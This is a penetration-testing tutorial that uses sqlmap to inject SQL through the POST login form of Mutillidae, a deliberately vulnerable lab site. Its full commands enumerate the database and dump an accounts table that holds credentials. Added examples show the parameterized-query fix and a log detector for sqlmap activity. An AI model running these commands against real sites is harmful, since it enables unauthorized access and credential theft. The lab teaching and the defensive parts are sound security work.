List of tools used for this demonstration (configuration of these tools is outside the scope of this tutorial)
- XAMPP (All-in-one Web Server and Database Server with PHP)
- Mutillidae (Purposely insecure PHP site created by Irongeek)
Running on Attacker’s System
- Backtrack 4 Beta (Linux Distro for Pentesters)
- ParosProxy (Web proxy program for examining web traffic) Installed on Backtrack 4
- SQLmap 0.6-rc5 (Automated SQL injection program) Installed on Backtrack 4
**Before you begin make sure you have ParosProxy running and your web browser pointing to it**
The first thing we do is browse to the site. I will be testing the login form on the login.php page.
Before we log in, let's look at the source code for the login form.
As you can see there are three input variables: user_name, password, and submit_button.
We also notice that the method is POST (which is why we are using this form for the example).
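What sqlmap is about to probe is the query behind that form. The following is an added example and not code from the original post or from Mutillidae: the same two POST fields, `user_name` and `password`, run through a login query built by string concatenation and through a parameterized query, against an in-memory SQLite table with constructed rows (Mutillidae itself is PHP on MySQL, which is not reproduced here).

```python
"""Added example (not from the original post or Mutillidae): the login
query pattern sqlmap probes, shown as string-concatenated (injectable)
and as a parameterized query. Runs against an in-memory SQLite table
with constructed sample rows."""
import sqlite3


def make_db():
    """Constructed sample 'accounts' table standing in for owasp10.accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?)",
        [("admin", "adminpass"), ("alice", "s3cret")],
    )
    return conn


def login_concat(conn, user_name, password):
    """Vulnerable: the POST fields are spliced into the SQL text, so a quote
    character in the input changes the structure of the statement."""
    sql = (
        "SELECT username FROM accounts WHERE username = '"
        + user_name + "' AND password = '" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_param(conn, user_name, password):
    """Hardened: placeholders keep the input as data; a quote in the input is
    compared literally and never becomes part of the SQL."""
    row = conn.execute(
        "SELECT username FROM accounts WHERE username = ? AND password = ?",
        (user_name, password),
    ).fetchone()
    return row[0] if row else None


def compare(user_name, password):
    """Run the same POST values through both versions and report what each
    returns. A stray quote leaves the concatenated statement unterminated,
    which is the database error an injection scanner looks for; the
    parameterized version simply finds no matching account."""
    conn = make_db()
    results = {}
    for name, fn in (("concat", login_concat), ("param", login_param)):
        try:
            results[name] = fn(conn, user_name, password)
        except sqlite3.OperationalError as exc:
            results[name] = "SQL error: " + str(exc)
    return results


if __name__ == "__main__":
    print(compare("admin", "adminpass"))   # both versions log the user in
    print(compare("admin'", "adminpass"))  # concat errors, param returns None
```

The fix is the second function: the shape of the query is fixed at parse time and the form values only ever fill the placeholders, so there is nothing for a `--data` probe to break out of.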
Now you can login. I will use the admin account to login. You could use any account though.
Username: admin
Password: adminpass
It isn't really necessary to log into the site, but I want to show you the POST variables as they are passed to the server within ParosProxy. Also, for this particular exercise, you will have to provide a valid username and password for the injection to work correctly in SQLmap, so you might as well make sure it works. Again, you don't have to use the admin account; you could even register a user first and then use that account.
And the page that tells me I have logged in successfully.
OK, now that we have successfully logged into the site, let's check Paros to see how that data was sent via the POST method.
As you can see, the format of the POST variables is as follows:
user_name=admin&password=adminpass&Submit_button=Submit
OK, now fire up sqlmap from a terminal. To make sqlmap check POST variables you need to specify the `--method "POST"` switch followed by the `--data` switch.
Here is the whole command for this example (notice how the POST data from Paros is supplied directly to the `--data` switch):
```shell
python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" \
    --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit"
```
It worked. sqlmap detected that the remote database server is MySQL ver. 5.X.X.
That is pretty much it, but just for fun let's enumerate some of the data. Let's check to see who the current user is:
```shell
python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" \
    --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit" \
    --current-user
```
Alright! Running as root… that is convenient. Let's see the databases:
```shell
python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" \
    --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit" \
    --dbs
```
OK, let's check out “owasp10” since that is the database for the Mutillidae website:
```shell
python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" \
    --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit" \
    --tables -D owasp10
```
Ooo… the “accounts” table looks interesting; let's get the data:
```shell
python sqlmap.py -u "http://10.170.23.166/mutillidae/index.php?page=login.php" \
    --method "POST" --data "user_name=admin&password=adminpass&Submit_button=Submit" \
    -D owasp10 -T accounts --dump
```
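Every one of the commands above sends a burst of POST requests to the same login page, many of which make the database throw errors. Seen from the web server, that activity has a recognizable shape. The following detector is an added example, not part of the original post: it parses constructed Apache combined-format log lines and flags a source that uses sqlmap's default User-Agent, sends an unusual number of requests to one path within a minute, or triggers repeated 5xx responses there. The sample lines, the source address 10.170.23.200, the exact User-Agent string and the thresholds are all assumptions. Access logs do not record POST bodies, so the check relies only on what the log actually contains.

```python
"""Added example (not from the original post): defender-side detection of
the scanner activity described above, run over constructed Apache combined
log lines. Signals used are the ones an access log actually exposes: the
tool's default User-Agent, a burst of requests to one endpoint from one
source, and error responses from that endpoint."""
import re
from collections import defaultdict

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

LOGIN = "/mutillidae/index.php?page=login.php"

# Constructed sample log: one ordinary login from a browser, then twelve
# requests in one minute from a second host (10.170.23.200, an assumed
# source address) carrying a sqlmap-style User-Agent, every third one
# answered with a 500 because the injected quote broke the query.
SAMPLE_LOG = "\n".join(
    ['192.168.1.10 - - [01/Jan/2010:10:00:00 +0000] "POST %s HTTP/1.1" '
     '200 5120 "-" "Mozilla/5.0"' % LOGIN]
    + ['10.170.23.200 - - [01/Jan/2010:10:05:%02d +0000] "POST %s HTTP/1.1" '
       '%d 4800 "-" "sqlmap/0.6-rc5 (http://sqlmap.sourceforge.net)"'
       % (i, LOGIN, 500 if i % 3 == 0 else 200) for i in range(12)]
)


def parse(log_text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    rows = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            row = m.groupdict()
            row["status"] = int(row["status"])
            rows.append(row)
    return rows


def detect(log_text, burst_threshold=10, error_threshold=3):
    """Group requests by (source IP, path, minute) and flag groups that show
    scanner signals. Thresholds are assumptions to tune per site."""
    groups = defaultdict(list)
    for r in parse(log_text):
        minute = r["time"][:17]  # "01/Jan/2010:10:05" from the timestamp
        groups[(r["ip"], r["path"], minute)].append(r)

    findings = []
    for (ip, path, minute), reqs in sorted(groups.items()):
        reasons = []
        # Default UA is a strong signal but disappears if the operator overrides it,
        # which is why the rate and error checks below are kept as well.
        if any("sqlmap" in r["ua"].lower() for r in reqs):
            reasons.append("sqlmap user-agent")
        if len(reqs) >= burst_threshold:
            reasons.append("%d requests in one minute" % len(reqs))
        errors = sum(1 for r in reqs if 500 <= r["status"] < 600)
        if errors >= error_threshold:
            reasons.append("%d server errors" % errors)
        if reasons:
            findings.append({"ip": ip, "path": path, "minute": minute, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f["ip"], f["path"], f["minute"], "; ".join(f["reasons"]))
```

The User-Agent match is the cheapest check and the easiest to evade, so the rate and error counts carry the weight in practice; the same grouping can be fed from an application log that does record the form fields if one is available.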
Posted by Nishobdo pothik